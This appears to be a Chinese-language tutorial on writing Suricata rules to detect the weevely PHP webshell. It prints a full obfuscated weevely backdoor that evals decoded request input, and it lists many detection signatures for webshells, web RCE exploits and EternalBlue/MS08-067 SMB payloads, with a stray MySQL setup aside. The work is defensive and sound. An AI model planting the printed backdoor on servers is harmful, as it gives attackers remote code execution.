suricata规则的编写

下面我们来写一下针对weevely4.0.1版本产生木马的拦截规则，首先我们通过抓包发现，在连接木马时不会通过网络层发包，只有连接成功后，执行指令时，才会通过网络层，应用层，看到TCP和HTTP请求和响应。所以我们只能针对其连接成功后执行的恶意指令执行匹配和拦截。

我们用通用正则表达式对木马进行匹配，先查看木马文件

weevely产生的PHP木马格式

<?php
$s='@x(@base6Vr4_decode($m[1])Vr,$k)))VrVr;$o=@ob_geVrtVr_conteVrnts();@Vrob_end_cleVraVr';
$B='$k="e10aVrdc39";Vr$kh="4Vr9baVr59abVrbe56"Vr;$kf="eVr057f20f883VrVre";$Vrp="ZwNqIe';
$K='ents("VrpVrhp://inpVrut"),Vr$m)==1) {@oVrb_staVrrt();@eVrval(@gVrzuVrncompreVrsVrsVr(';
$Y='}^Vr$Vrk{$j};}}retVrurn $o;}Vrif (@prVreg_VrmVratch("Vr/$Vrkh(.+)$Vrkf/",@fiVrle_get_cont';
$A='orVr($i=0Vr;$VriVr<$l;){forVr($j=0;($j<$cVr&&$Vri<$l);$j+VrVr+,$i++){$o.=$t{$Vri';
$V='n();$r=@basVre64Vr_encode(@xVr(@gzcomVrVrpress($oVr),$k));prVrint("$Vrp$kh$rVr$kf");}';
$i='lcBgDVrHKsyVrm";functioVrVrn xVr($t,$k){$c=strlVren($Vrk);$l=stVrrlen($Vrt);$o=Vr""Vr;f';
$p=str_replace('XU','','crXUeXUateXUXU_funXUXUction');
$T=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>

我们解读以下，在几个这种木马中，我们可以看到一些相似的地方，比如

<?php
$(字母)





$(字母)=str_replace();
$(字母)=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>

这几行一般weevely生成的木马中都有，所以我们进行正则匹配

先来看这样

1	\x3c\x3fphp[\s\n]\x24\w\x3d

大量存在的\xab类字符，后面的ab为这个字母在ascii码下的16进制表示。所以显然前面匹配的就是<?php而后面[\s\n]。

这里面\s表示匹配空格，\n表示匹配换行，也就是匹配了整个第一行，换行开始匹配第二行。

然后后面的\x24表示$符号，\w非常神奇，表示匹配任意字母！，也就i是匹配了变量的名字。最后\x3d匹配了等号，所以我们上面呢正则表达式一直匹配到。

1
2

<?php
$s=

对于最后三行的匹配如下：

1
2
3

$(字母)=str_replace('Vr','',$B.$i.$A.$Y.$K.$s.$V);
$b=$p('',$T);$b();
?>

1 2	\x24\w\x3dstr_replace\x28\x27.{1,20}\x27\x2c\x27\x27\x2c(\x24\w\x2e)+\x24\w.? \x24\w\x3d\x24\w\x28\x27\x27\x2c\x24\w\x28\x29\x3b.?\x3f\x3e

显然我们的/x27为匹配单引号，\x2c为匹配逗号。

上面\x27后面的.为匹配除了换行符以外的任何字符，而{1, 20}也就是重复1到20次。

而后面唯一有争议的是.*?这里是匹配多个字符，贪婪匹配法，所以会匹配一行的空格，一直到最后一个换行符之前！然而?代表了收敛，也就是将匹配到的这些空格匹配0次或一次，所以只匹配一次，不会再重演这些空格！下面的式子也是这个意思，所以它和回溯匹配有一些相像，但是并没有按照回溯匹配的进行返回寻找，重新匹配。这里介绍一下回溯匹配。

alert any any -> any any (msg:PHP weevely webshell; http.request_body;content:"<?php";pcre:"/\x24\w\x3dstr_replace\x28\x27.{1,20}\x27\x2c\x27\x27\x2c(\x24\w\x2e)+\x24\w.*?\x24\w\x3d\x24\w\x28\x27\x27\x2c\x24\w\x28\x29\x3b.*?\x3f\x3e/";classtype:weevely-webshell;sid:3;rev:1;)

组和用户是递进关系，我们配置mysql时候可以先添加组group，然后添加用户user

1 2	groupadd mysql useradd -g mysql mysql

然后对用户授权

1	chown -R mysql.mysql /usr/local/mysql-8.0

我们重新打开的时候，如果没有IP地址，可以进行重新分配，

1	sudo dhclient ens33

我们开启http服务，

1	yum install httpd php php-common

下面整合weevely规则

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M1"; flow:to_server,established; http.header; content:"QHBhc3N0aHJ1KC";sid:2013938; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M2"; flow:to_server,established; http.header; content:"BwYXNzdGhydSgn";classtype:web-application-activity; sid:2025593; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (passthru() function used) M3"; flow:to_server,established; http.header; content:"AcGFzc3RocnUoJ";sid:2025594; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (pcntl_exec() function used)"; flow:to_server,established; http.header; content:"JGFyZ3MgPSBh";classtype:web-application-activity; sid:2013943; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (python_eval() function used)"; flow:to_server,established; http.header; content:"QHB5dGhvbl9l";classtype:web-application-activity; sid:2013942; rev:6;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - Downloaded"; flow:established,to_client; file_data; content:"<?php|0A|$"; content:"="; distance:4; within:2; content:" str_replace("; distance:0; classtype:trojan-activity; sid:2020555; rev:2;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (shell_exec() function used)"; flow:to_server,established; http.header; content:"aGVsbF9l";classtype:web-application-activity; sid:2013939; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (proc_open() function used)"; flow:to_server,established; http.header; content:"JHAgPSBhcnJheShhcnJh";classtype:web-application-activity; sid:2013940; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (popen() function used)"; flow:to_server,established; http.header; content:"JGggPSBwb3Bl";classtype:web-application-activity; sid:2013941; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (perl->system() function used)"; flow:to_server,established; http.header; content:"JHBlcmwgPSBuZXcg";classtype:web-application-activity; sid:2013944; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (exec() function used)"; flow:to_server,established; http.header; content:"ZXhlYygn";classtype:web-application-activity; sid:2013945; rev:5;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Weevely PHP backdoor detected (system() function used)"; flow:to_server,established; http.header; content:"QHN5c3Rl";classtype:web-application-activity; sid:2013937; rev:7;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MorXploit Shell Command"; flow:established,to_server; http.uri; content:"?cmd=ZXhpdA=="; fast_pattern; http.user_agent; content:"Mozilla 5"; startswith;classtype:bad-unknown; sid:2019951; rev:3;)

alert http any any -> any any (msg:"ET WEB_SERVER ATTACKER WebShell - 1337w0rm - cPanel Cracker"; flow:established,to_server; http.request_body; content:"user=CRACKER"; classtype:trojan-activity; sid:2020097; rev:3;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER PHP System Command in HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"<?"; content:"system|28|"; distance:0; classtype:web-application-attack; sid:2020102; rev:5;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER WPScan User Agent"; flow:established,to_server; threshold: type limit, count 1, seconds 60, track by_src; http.user_agent; content:"WPScan v"; depth:8; classtype:web-application-attack; sid:2020338; rev:4;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - POSTed"; flow:established,to_server; http.request_body; content:"<?php|0A|$"; content:"="; distance:4; within:2; content:" str_replace("; distance:0; classtype:trojan-activity; sid:2020556; rev:3;)

alert http any any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER ATTACKER WebShell - Weevely - Cookie"; flow:established,to_server; http.header; content:"ing|3a| identity|0D 0A|Host|3a|"; http.cookie; content:"SESS="; content:"|3B| SID="; distance:0; content:"|3B| PREF="; distance:0; content:"|3B|SSID="; distance:0; classtype:trojan-activity; sid:2020557; rev:3;)

试试weevely新规则

alert http any any -> any any (msg:"MALWARE BACKDOOR Weevely PHP backdoor detected"; flow:established,to_server; content:"POST"; http_method; content:"Accept-Encoding|3a| identity"; http_header; content:"Content-Length: 83"; flowbits:set, Weevely_post_request; noalert; classtype:web-application-attack; sid:2000001;rev:1; metadata:created_at 2022_06_23, by sampson;)

alert http any any -> any any (msg:"MALWARE BACKDOOR Weevely PHP backdoor detected"; flow:established,to_client; content:"200"; http_stat_code; content:"|3d 3d|"; http_server_body; nocase;flowbits: isset, Weevely_post_request; classtype:web-application-attack;sid:2000002; rev:1; metadata:created_at 2022_06_23, by sampson;)

alert http any any -> any any (msg:"结尾是0，有嫌疑"; flow:established,to_client; content:"200"; http_stat_code; content:"\r\n|30|"; http_server_body; nocase;flowbits: isset, Weevely_post_request; classtype:web-application-attack;sid:2000002; rev:1; metadata:created_at 2022_06_23, by sampson;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Authenticated QuickBox CE 2.5.5/Pro 2.1.8 RCE Attempt Inbound M1 (CVE-2020-13448)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/index.php?id=88&servicestart="; fast_pattern; content:"|3b|sudo"; distance:0; reference:url,www.exploit-db.com/exploits/48536; reference:url,s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/; reference:cve,2020-13448; classtype:attempted-admin; sid:2030237; rev:1; metadata:attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Authenticated QuickBox CE 2.5.5/Pro 2.1.8 RCE Attempt Inbound M2 (CVE-2020-13448)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/index.php?id=88&servicestart="; fast_pattern; content:"|3b|wget"; distance:0; reference:url,www.exploit-db.com/exploits/48536; reference:url,s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/; reference:cve,2020-13448; classtype:attempted-admin; sid:2030238; rev:1; metadata:attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible WordPress Plugin BBPress 2.5 - Unauthenticated Priv Esc Attempt (CVE-2020-13693)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user_login"; content:"user_pass"; distance:0; content:"|22|bbp_keymaster|22|"; distance:0; fast_pattern; reference:url,www.exploit-db.com/exploits/48534; reference:cve,2020-13693; classtype:attempted-admin; sid:2030239; rev:1; metadata:affected_product Wordpress_Plugins, attack_target Web_Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_server; http.method; content:"PUT"; http.cookie; content:"vcloud_jwt="; startswith; http.request_body; content:"|3a|Host|3e 24 7b|"; content:".getDeclaredConstructors|28 29 5b|"; distance:0; fast_pattern; flowbits:set,ET.20203956; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030240; rev:1; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)


alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,from_server; http.stat_code; content:"400"; http.response_body; content:"<Error"; content:"has|20|invalid|20|length|20|for"; fast_pattern; flowbits:isset,ET.20203956; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030241; rev:1; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, deployment Perimeter, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2020_06_02;)

MS17_010

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible Successful ETERNALROMANCE MS17-010 - Windows Executable Observed"; flow:to_server,established; flowbits:isset,ETPRO.ETERNALROMANCE; content:"|FF|SMB|26 00 00 00 00|"; offset:4; depth:9; content:"|4d 5a|"; distance:0; content:"This program cannot be run"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:2024207; rev:3; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2022_03_17;)


alert tcp any any -> any 445 (msg:"ET EXPLOIT ETERNALBLUE Exploit M2 MS17-010"; flow:established,to_server; content:"|8000a80000000000000000000000000000000000ffff000000000000ffff0000000000000000000000000000000000000000000000f1dfff000000000000000020f0dfff00f1dfffffffffff600004100000000080efdfff|"; reference:cve,CVE-2017-0143; classtype:attempted-admin; sid:2024297; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_05_16, deployment Perimeter, former_category CURRENT_EVENTS, performance_impact Low, signature_severity Major, updated_at 2017_07_06;)


alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE Exploit M3 MS17-010"; flow:to_server,established; content:"|ff|SMB|32 00 00 00 00 18 07 c0|"; offset:4; depth:12; content:"|00 00 00 00 00 00 00 00 00 00 00 08 ff fe 00 08|"; distance:2; within:16; fast_pattern; content:"|0f 0c 00 00 10 01 00 00 00 00 00 00 00 f2 00 00 00 00 00 0c 00 42 00 00 10 4e 00 01 00 0e 00 0d 10 00|"; distance:2; within:34; isdataat:1000,relative; threshold: type both, track by_src, count 10, seconds 1; classtype:trojan-activity; sid:2024430; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2017_06_27, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2017_07_06;)

MS08_067

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ECLIPSEDWING MS08-067"; flow:to_server,established; content:"|ff|SMB|2f 00 00 00 00|"; offset:4; depth:9; content:"|00 00 00 00 ff ff ff ff 08 00|"; distance:30; within:10; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; fast_pattern; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; isdataat:800,relative; classtype:trojan-activity; sid:2024215; rev:1; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2017_04_17;)